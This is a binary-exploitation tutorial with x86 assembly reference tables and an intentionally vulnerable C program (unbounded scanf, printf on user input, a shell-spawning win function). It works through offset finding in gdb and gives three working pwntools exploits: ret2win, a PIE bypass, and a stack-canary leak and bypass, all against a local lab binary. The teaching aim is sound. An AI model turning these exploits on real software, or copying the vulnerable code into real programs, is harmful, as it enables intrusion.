Binary Exploitation
Assembly Overview#
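Assembly language is a low-level programming language whose instructions map almost one-to-one onto machine instructions; compilers translate high-level code down to it. Registers are small, fast storage locations inside the CPU that temporarily hold data and facilitate operations.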
Core Registers
| Reg | 32b | 64b | Usage |
|---|---|---|---|
| Math | EAX | RAX | Return, Math |
| Base | EBX | RBX | Memory Base |
| Count | ECX | RCX | Loops, 4th Arg |
| Data | EDX | RDX | I/O, 3rd Arg |
| Index | ESI/EDI | RSI/RDI | 2nd/1st Arg |
| Stack | ESP/EBP | RSP/RBP | Stack/Frame Ptr |
| Extra | - | R8-R15 | 5th/6th Arg (R8/R9) |
Register Sizes
| 64b | 32b | 16b | 8b |
|---|---|---|---|
| RAX-RDX | EAX-EDX | AX-DX | AL-DL |
| RSP/RBP | ESP/EBP | SP/BP | SPL/BPL |
| RSI/RDI | ESI/EDI | SI/DI | SIL/DIL |
| R8-R15 | R8D-R15D | R8W-R15W | R8B-R15B |
Memory & Types
| Type | 32b | 64b |
|---|---|---|
| Word | 2B | 2B |
| DWord | 4B | 4B |
| QWord | - | 8B |
| Ptr | 4B | 8B |
| Addr | 4GB | 16EB |
Instructions
| Type | Mnemonic | Opcode | Effect |
|---|---|---|---|
| Data | mov,lea | 0x89,8D | Transfer |
| Math | add,sub | 0x01,29 | Arithmetic |
| Flow | jmp,call | 0xEB,E8 | Control |
| Stack | push,pop | 0x50+r | Stack ops |
| Logic | and,or,xor | 0x21,09,31 | Bitwise |
| Test | cmp,test | 0x39,85 | Compare |
Conditionals
| Jump | Op | Flags | Test |
|---|---|---|---|
| je/jz | 74 | ZF=1 | Equal |
| jne | 75 | ZF=0 | Not Equal |
| jg | 7F | SF=OF,ZF=0 | Greater |
| jl | 7C | SF≠OF | Less |
| jge | 7D | SF=OF | Greater/Equal |
| jle | 7E | ZF=1∨SF≠OF | Less/Equal |
Status Flags
| Bit | Flag | Use |
|---|---|---|
| 0 | CF | Carry |
| 6 | ZF | Zero |
| 7 | SF | Sign |
| 11 | OF | Overflow |
| 2 | PF | Parity |
| 4 | AF | Adjust |
| 10 | DF | Direction |
| 9 | IF | Interrupt |
Dereferencing
| Command | Explanation | Example Use Case |
|---|---|---|
| mov rbx, [rax] | Read memory at address in rax into rbx | Reading a variable value |
| mov [rax], 10 | Write value 10 to memory at address in rax | Storing immediate value |
| lea rbx, [rax] | Load the effective address of [rax] (the value of rax itself, no memory access) into rbx | Getting pointer address |
Properties
| Feature | Value | Impact |
|---|---|---|
| Format | ELF | Linux executable |
| Architecture | 64-bit LSB | x86_64 little-endian |
| RELRO | Partial | Some segments read-only |
| STACK CANARY | None | No stack overflow detection |
| NX | Enabled | Memory regions not executable |
| PIE | Enabled | Random program loading |
| RPATH/RUNPATH | None | Standard library paths |
| Symbols | 67 | Debug symbols available |
| FORTIFY | No | No runtime checks |
| Linking | Dynamic | Uses shared libraries |
| Interpreter | /lib64/ld-linux-x86-64.so.2 | Dynamic linker |
| Debug Info | Not stripped | Has symbol table |
| BuildID | Present | Debug info identifier |
Resources#
Learning
Challenges
Vulnerable Example#
vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* Target function: spawns a shell via system("/bin/sh"). Neither vuln() nor
 * main() calls it, so it only runs if control flow is redirected to it. */
void win() { system("/bin/sh"); }
/* Prompts for one whitespace-delimited token, stores it in a 32-byte stack
 * buffer and echoes it back. Intentionally vulnerable: this is the function
 * the rest of the tutorial exploits. */
void vuln() {
char buf[32];
/* "%s" carries no field width, so a token longer than 31 characters is
 * written past the end of buf (stack buffer overflow). */
printf("> "); scanf("%s", buf);
/* The user-controlled buffer is passed as the format string itself, so
 * directives such as %p inside the input are interpreted by printf. */
printf(buf); printf("\n");
return;
}
/* Switches stdout to unbuffered mode, then calls vuln() forever. */
int main() {
/* _IONBF: output (including the "> " prompt) is written immediately
 * instead of being held in a stdio buffer. */
setvbuf(stdout, NULL, _IONBF, 0);
/* Each iteration is one prompt/echo round, so several inputs can be sent
 * to the same process. */
while(1) { vuln(); }
/* Not reached: the loop above never terminates. */
return 0;
}
Let’s start simple, with PIE and stack canaries disabled and a 32-bit build for shorter addresses:
gcc vuln.c -o vuln -m32 -no-pie -fno-stack-protector
❯ gdb vuln
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg> r
Starting program: /home/e/vuln
> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
Program received signal SIGSEGV, Segmentation fault.
Invalid address 0x6161616c
pwndbg> cyclic -l 0x6161616c
Finding cyclic pattern of 4 bytes: b'laaa' (hex: 0x6c616161)
Found at offset 44
Note: If we switch to a 64-bit build, the offset changes. However, the same exploit still works once you update the offset and the addresses.
gcc vuln.c -o vuln -no-pie -fno-stack-protector
❯ gdb vuln
pwndbg> cyclic 100
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
pwndbg> r
Starting program: /home/e/vuln
> aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
Program received signal SIGSEGV, Segmentation fault.
─────────────[ DISASM / x86-64 / set emulate on ]──────────────
► 0x4011ca <vuln+94> ret <0x6161616161616166>
↓
pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40
❯ ropper --file ./vuln --search "ret"
0x000000000040101a: ret;
So now the offset is 40 instead of 44. On 64-bit we also run into stack-alignment issues, so we place a ret gadget in front of the address of win.
Thanks to the format-string vulnerability we can also leak information; this will come in handy later, when more protections are enabled.
#!/usr/bin/env python3
from pwn import *
# Path of the target binary (built from vuln.c).
exe = './vuln'

# Load the ELF once, keep a handle to it, and register it as the pwntools
# context binary.
elf = ELF(exe, checksec=False)
context.binary = elf

# gdb.attach() opens the debugger in a horizontal tmux split.
context.terminal = ["tmux", "splitw", "-h"]
context.log_level = 'info'
def fsleak(num=40):
    """Leak stack values through the format-string bug, one ``%<n>$p`` per prompt.

    Talks to the module-level ``io`` tube. Positional printf arguments are
    1-indexed, so probing starts at 1 (``%0$p`` is not a valid directive).

    Args:
        num: Exclusive upper bound of the positional indexes to probe.

    Returns:
        dict mapping positional index -> leaked value as an int, for every
        index whose output parsed as a ``0x``-prefixed hexadecimal number.
    """
    leaks = {}
    log.info("Leaking stack values:")
    for offset in range(1, num):
        try:
            io.recvuntil(b'>')
            io.sendline(f'%{offset}$p'.encode())
            leak = io.recvline().strip()
        except EOFError:
            # The target exited or closed the pipe; later probes cannot succeed.
            log.warning(f"Connection closed while leaking offset {offset}")
            break
        # "(nil)" and any other non-pointer output is simply skipped.
        if not leak.startswith(b'0x'):
            continue
        try:
            addr = int(leak, 16)
        except ValueError:
            # Output started with 0x but was not a clean hex number.
            continue
        leaks[offset] = addr
        log.info(f"Offset {offset}: {leak.decode()}")
    return leaks
def ret2win():
    """Build the overflow payload that redirects execution to ``win``.

    The layout depends on the ELF class of the loaded binary: 64-bit uses 40
    bytes of padding followed by a lone ``ret`` gadget and then ``win``;
    anything else uses 44 bytes of padding followed directly by ``win``.

    Side effects: logs the payload as hex and attaches gdb to the
    module-level ``io`` process (continuing immediately).

    Returns:
        The payload as bytes.
    """
    win_packed = pack(elf.symbols['win'])
    if elf.elfclass == 64:
        # The extra `ret` (0x40101a) precedes win to deal with stack alignment.
        pieces = [b'\x90' * 40, pack(0x40101a), win_packed]
    else:
        pieces = [b'\x90' * 44, win_packed]
    payload = b''.join(pieces)
    log.info("Payload (hex): " + payload.hex())
    gdb.attach(io, gdbscript="c")
    return payload
def main():
    """Start the target, dump a few stack values, then send the ret2win payload.

    Stores the process tube in the module-level ``io`` so that ``fsleak`` and
    ``ret2win`` can use it, and finally hands the session to the user.
    """
    global io
    target_env = {'LD_PRELOAD': ''}
    io = process([exe], env=target_env)
    fsleak(10)
    # Build the payload first (this also attaches gdb), then deliver it at
    # the next prompt.
    payload = ret2win()
    io.sendlineafter(b'> ', payload)
    io.interactive()


if __name__ == '__main__':
    main()
gcc vuln.c -o vuln -fno-stack-protector
Dropping -no-pie makes the binary a position-independent executable (PIE): with ASLR enabled, its base address is randomized on every run. As a result, every absolute function address changes and the previous exploit, which hard-codes them, no longer works. You can verify this by running ldd vuln several times: the addresses change on each run. While you can disable ASLR on your local machine, it cannot be disabled for programs hosted on other machines, such as in CTFs.
Now we use the format-string vulnerability to leak a runtime address.
If we call fsleak() and, in the gdb pane, run x <address> on each leaked value, we can see what we are actually leaking.
pwndbg> info address main
Symbol "main" is at 0x11e4 in a file compiled without debugging.
We look for a leaked value that matches main's offset 0x11e4: here offset 17 of the format-string leak is 0x6403f709d1e4, which is the runtime address of main.
pwndbg> x 0x6403f709d1e4
0x6403f709d1e4 <main>: 0xe5894855
pwndbg> info proc mappings
Mapped address spaces:
Start Addr End Addr Size Offset Perms objfile
0x6403f709c000 0x6403f709d000 0x1000 0x0 r--p /home/e/vuln
0x6403f709d000 0x6403f709e000 0x1000 0x1000 r-xp /home/e/vuln
❯ nm -n vuln | grep " main"
00000000000011e4 T main
By leaking and obtaining the 17th element, ‘main’, we can subtract 0x11e4 to calculate the base address.
#!/usr/bin/env python3
from pwn import *
# Path of the target binary (built from vuln.c).
exe = './vuln'

# Load the ELF once, keep a handle to it, and register it as the pwntools
# context binary.
elf = ELF(exe, checksec=False)
context.binary = elf

context.log_level = 'info'
def fsleak(num=40):
    """Leak stack values through the format-string bug, one ``%<n>$p`` per prompt.

    Talks to the module-level ``io`` tube. Positional printf arguments are
    1-indexed, so probing starts at 1 (``%0$p`` is not a valid directive).

    Args:
        num: Exclusive upper bound of the positional indexes to probe.

    Returns:
        dict mapping positional index -> leaked value as an int, for every
        index whose output parsed as a ``0x``-prefixed hexadecimal number.
    """
    leaks = {}
    log.info("Leaking stack values:")
    for offset in range(1, num):
        try:
            io.recvuntil(b'>')
            io.sendline(f'%{offset}$p'.encode())
            leak = io.recvline().strip()
        except EOFError:
            # The target exited or closed the pipe; later probes cannot succeed.
            log.warning(f"Connection closed while leaking offset {offset}")
            break
        # "(nil)" and any other non-pointer output is simply skipped.
        if not leak.startswith(b'0x'):
            continue
        try:
            addr = int(leak, 16)
        except ValueError:
            # Output started with 0x but was not a clean hex number.
            continue
        leaks[offset] = addr
        log.info(f"Offset {offset}: {leak.decode()}")
    return leaks
if __name__ == '__main__':
    # PIE exploit: leak the runtime address of main() through the
    # format-string bug, rebase the ELF, then overflow the buffer to reach win().
    is_64bit = elf.elfclass == 64

    io = process(exe)
    # Uncomment to dump the stack and locate the index that leaks main():
    # fsleak()

    # Positional index at which main() shows up on the stack: 17 on the
    # 64-bit build, 29 otherwise.
    io.recvuntil(b'> ')
    io.sendline(b'%17$p' if is_64bit else b'%29$p')
    main_leak = int(io.recvline().strip(), 16)

    # Base address = leaked main - offset of main inside the binary.
    # 0x11e4 is the 64-bit offset; 0x1244 is presumably the 32-bit one —
    # confirm with `nm -n vuln | grep " main"` after rebuilding.
    elf.address = main_leak - (0x11e4 if is_64bit else 0x1244)
    log.info(f"Base address: {hex(elf.address)}")
    log.info(f"Win function address: {hex(elf.symbols.win)}")

    # Offset of a lone `ret` inside the binary, rebased to the runtime address.
    ret_gadget = elf.address + 0x101a
    if is_64bit:
        payload = b'\x90' * 40 + pack(ret_gadget) + pack(elf.symbols.win)
    else:
        # pack() follows the context word size, so the return address is
        # 4 bytes here; the previous p64() emitted 8 bytes on a 32-bit target.
        payload = b'\x90' * 44 + pack(elf.symbols.win)

    gdb.attach(io, gdbscript="c")
    io.sendlineafter(b'> ', payload)
    io.interactive()
gcc vuln.c -o vuln -no-pie && python poc
Removing -fno-stack-protector enables stack canaries.
Now a buffer overflow aborts the program with:
*** stack smashing detected ***: terminated
So we first need to leak the canary, again using the format-string vulnerability.
#!/usr/bin/env python3
from pwn import *
# Path of the target binary (built from vuln.c).
exe = './vuln'

# Load the ELF once, keep a handle to it, and register it as the pwntools
# context binary.
elf = ELF(exe, checksec=False)
context.binary = elf

# gdb.attach() opens the debugger in a horizontal tmux split.
context.terminal = ["tmux", "splitw", "-h"]
context.log_level = 'info'
def fsleak(num=40):
    """Leak stack values through the format-string bug, one ``%<n>$p`` per prompt.

    Talks to the module-level ``io`` tube. Positional printf arguments are
    1-indexed, so probing starts at 1 (``%0$p`` is not a valid directive).

    Args:
        num: Exclusive upper bound of the positional indexes to probe.

    Returns:
        dict mapping positional index -> leaked value as an int, for every
        index whose output parsed as a ``0x``-prefixed hexadecimal number.
    """
    leaks = {}
    log.info("Leaking stack values:")
    for offset in range(1, num):
        try:
            io.recvuntil(b'>')
            io.sendline(f'%{offset}$p'.encode())
            leak = io.recvline().strip()
        except EOFError:
            # The target exited or closed the pipe; later probes cannot succeed.
            log.warning(f"Connection closed while leaking offset {offset}")
            break
        # "(nil)" and any other non-pointer output is simply skipped.
        if not leak.startswith(b'0x'):
            continue
        try:
            addr = int(leak, 16)
        except ValueError:
            # Output started with 0x but was not a clean hex number.
            continue
        leaks[offset] = addr
        log.info(f"Offset {offset}: {leak.decode()}")
    return leaks
def find_canaries(io, start=1, end=40):
    """Scan positional format-string arguments for values that look like a canary.

    A value is reported as a candidate when its least-significant byte is
    zero. The check is applied for every ELF class; it was previously gated
    on a 32-bit binary, so nothing was ever reported on a 64-bit build.

    Args:
        io: Tube connected to the target, positioned before a ``>`` prompt.
        start: First positional index to probe (inclusive).
        end: Last positional index to probe (exclusive).

    Returns:
        List of ``(index, value)`` tuples, in probing order.
    """
    log.info("Searching for canary pattern on stack...")
    found = []
    for i in range(start, end):
        try:
            io.recvuntil(b'>')
            io.sendline(f'%{i}$p'.encode())
            leak = io.recvline().strip()
        except EOFError:
            # The target exited or closed the pipe; later probes cannot succeed.
            log.warning(f"Connection closed while probing offset {i}")
            break
        if not leak.startswith(b'0x'):
            continue
        try:
            value = int(leak, 16)
        except ValueError:
            continue
        if value & 0xff == 0:
            log.info(f"Potential canary at offset {i}: {hex(value)}")
            found.append((i, value))
    return found
def build_payload(canary):
    """Build the overflow payload that survives the stack-canary check.

    Layout: 40 bytes of padding, the leaked canary, one zero word, a lone
    ``ret`` gadget, then the address of ``win``. Every word is packed with
    the context word size.

    Args:
        canary: Canary value leaked from the same process the payload is
            sent to.

    Returns:
        The payload as bytes.
    """
    # Resolve win from the loaded binary instead of hard-coding it: its
    # address shifts whenever the build flags change the code layout.
    win_addr = elf.symbols['win']
    # Address of a lone `ret` in the non-PIE binary (from ropper).
    ret_addr = 0x40101a
    return b''.join([
        b'\x90' * 40,
        pack(canary),
        pack(0),
        pack(ret_addr),
        pack(win_addr),
    ])
def main():
    """Leak the stack canary via the format string, then send the overflow.

    A first process is used only for reconnaissance (stack dump and canary
    candidates) and is then closed. The canary is leaked again from a fresh
    process, because the payload must carry the canary of the process it is
    sent to.
    """
    global io
    # Bind io up front so the except handler can test it even when
    # process() itself fails.
    io = None
    try:
        io = process(exe)
        fsleak()
        canaries = find_canaries(io)
        # The reconnaissance process is finished either way; do not leak it.
        io.close()
        if not canaries:
            log.failure("No potential canaries found!")
            return

        io = process(exe)
        gdb.attach(io, "\ncanary --all\nc\n")

        # Positional index used to read the canary for this build.
        canary_offset = 11
        if canary_offset not in {offset for offset, _ in canaries}:
            log.warning(
                f"Offset {canary_offset} was not among the canary candidates: "
                f"{[offset for offset, _ in canaries]}"
            )

        io.recvuntil(b'>')
        io.sendline(f'%{canary_offset}$p'.encode())
        canary = int(io.recvline().strip(), 16)

        payload = build_payload(canary)
        io.sendlineafter(b'>', payload)
        io.interactive()
    except Exception as e:
        log.failure(f"Exploit failed: {str(e)}")
        if io is not None:
            io.close()


if __name__ == '__main__':
    main()